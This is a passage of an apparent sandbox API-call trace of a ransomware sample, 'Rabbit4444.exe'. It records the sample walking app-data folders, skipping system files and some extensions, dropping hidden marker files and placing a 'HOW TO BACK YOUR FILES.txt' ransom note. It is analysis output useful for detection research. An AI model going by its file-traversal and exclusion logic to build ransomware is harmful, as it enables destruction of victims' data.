nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0061.231] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0061.231] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0061.231] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0061.232] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0061.232] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0061.232] lstrlenW (lpString="Rabbit4444") returned 10 [0061.232] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0061.232] lstrlenW (lpString=".dll") returned 4 [0061.232] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0061.232] lstrlenW (lpString=".lnk") returned 4 [0061.232] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0061.232] lstrlenW (lpString=".ini") returned 4 [0061.232] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0061.232] lstrlenW (lpString=".sys") returned 4 [0061.232] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0061.232] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdac65b0d, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0xdac65b0d, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0xdac65b0d, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0061.232] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0061.232] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.233] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.233] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.233] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.234] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.234] CloseHandle (hObject=0x2a0) returned 1 [0061.234] CloseHandle (hObject=0x27c) returned 1 [0061.234] GetCurrentThreadId () returned 0xd98 [0061.234] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0061.234] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState" [0061.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124478 | out: hHeap=0xe0000) returned 1 [0061.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0061.235] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState" [0061.235] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\" [0061.235] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0061.235] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.236] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.239] FlushFileBuffers (hFile=0x27c) returned 1 [0061.240] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.240] CloseHandle (hObject=0x27c) returned 1 [0061.240] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState") returned 85 [0061.240] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.240] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263c636, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd165ca, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.241] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.241] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.241] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.241] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.241] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263c636, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd165ca, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.241] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.241] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.241] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.241] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.241] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.241] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd165ca, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd165ca, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.241] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.241] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.241] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd165ca, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd165ca, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.241] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.241] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.242] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.242] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.242] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.242] CloseHandle (hObject=0x2a0) returned 1 [0061.242] CloseHandle (hObject=0x27c) returned 1 [0061.242] GetCurrentThreadId () returned 0xd98 [0061.242] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0061.242] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState" [0061.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118de8 | out: hHeap=0xe0000) returned 1 [0061.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0061.242] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState" [0061.242] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\" [0061.242] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0061.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.244] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.246] FlushFileBuffers (hFile=0x27c) returned 1 [0061.247] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.247] CloseHandle (hObject=0x27c) returned 1 [0061.247] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState") returned 83 [0061.247] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.247] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263bbc8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.247] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.247] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.247] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.247] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.248] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263bbc8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.248] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.248] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.248] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.248] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.248] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.248] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd3c810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd3c810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.248] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.248] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.248] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd3c810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd3c810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.248] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.248] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.248] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.248] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.248] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.249] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.249] CloseHandle (hObject=0x2a0) returned 1 [0061.249] CloseHandle (hObject=0x27c) returned 1 [0061.249] GetCurrentThreadId () returned 0xd98 [0061.249] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0061.249] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache" [0061.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118658 | out: hHeap=0xe0000) returned 1 [0061.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0061.249] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache" [0061.249] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\" [0061.249] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0061.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.250] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.253] FlushFileBuffers (hFile=0x27c) returned 1 [0061.256] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.256] CloseHandle (hObject=0x27c) returned 1 [0061.263] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache") returned 83 [0061.263] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.263] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf67c392c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263b30b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0061.264] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.264] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.264] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.264] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.264] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf67c392c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263b30b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd3c810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.264] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.264] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.264] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.264] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.264] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.264] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd3c810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd3c810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedd62a39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.264] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.264] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.264] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, 